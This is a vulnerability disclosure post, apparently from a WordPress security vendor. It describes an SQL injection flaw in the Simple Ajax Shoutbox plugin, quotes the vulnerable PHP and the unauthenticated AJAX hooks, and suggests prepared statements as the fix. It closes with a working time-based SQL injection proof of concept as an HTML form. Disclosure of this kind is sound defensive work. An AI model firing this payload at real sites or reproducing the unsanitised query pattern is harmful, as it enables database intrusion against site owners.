Would A Hacker Be Interested in This SQL Injection Vulnerability in Simple Ajax Shoutbox?
One of the ways we keep ahead of others when it comes to vulnerabilities in WordPress plugins, so that we can provide our customers with better security is that we monitor third-party data for indications that hackers are targeting WordPress plugins. Through that we just ran across someone possibly probing for usage of the plugin Simple Ajax Shoutbox by requesting the readme.txt file for it. That isn’t a very popular plugin, with only 1,000+ active installations according to wordpress.org, and hasn’t been updated in two years.
In a quick look over the plugin we didn’t see an obvious vulnerability that hackers would be interested in exploiting, though there were some things that look like they might cause a serious issue. But what did stand our right away is that that there is an easy to spot SQL injection vulnerability. That isn’t really isn’t something hackers seem all that interested in, but we can at least warn our customers and others that hackers might be targeting this plugin.
The SQL injection that immediately stood out to us is in the single() where POST input is extracted and the value of the POST input “m_id” is then directly used in a SQL statement, which permits SQL injection to occur:
396 397 398 399 400 | static function single() { extract($_POST); global $wpdb; $table_name = $wpdb->prefix . "messagebox"; if ($row = $wpdb->get_row("SELECT * , post_date FROM $table_name WHERE id=$m_id")) { |
That would probably be best secured by using a prepared statement and if you wanted to be extra safe, restricting the value of that POST input to integers when setting a variable to its value.
That function is accessible to anyone, as it is registered to accessible through WordPress AJAX functionality to those logged in as well those not logged in:
65 66 | add_action('wp_ajax_shoutbox_single', array(__CLASS__, 'single')); add_action('wp_ajax_nopriv_shoutbox_single', array(__CLASS__, 'single')); |
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Proof of Concept
The following proof of concept will take varying amounts of time for the page to load depending on how long you specify MySQL sleep function to run.
Make sure to replace “[path to WordPress]” with the location of WordPress, “[message ID]” with the ID of message, and “[sleep time]” with how many seconds you want sleep to occur for.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=shoutbox_single" method="POST"> <input type="hidden" name="m_id" value="[message ID] AND SLEEP([sleep time])" /> <input type="submit" value="Submit" /> </form> </body> </html>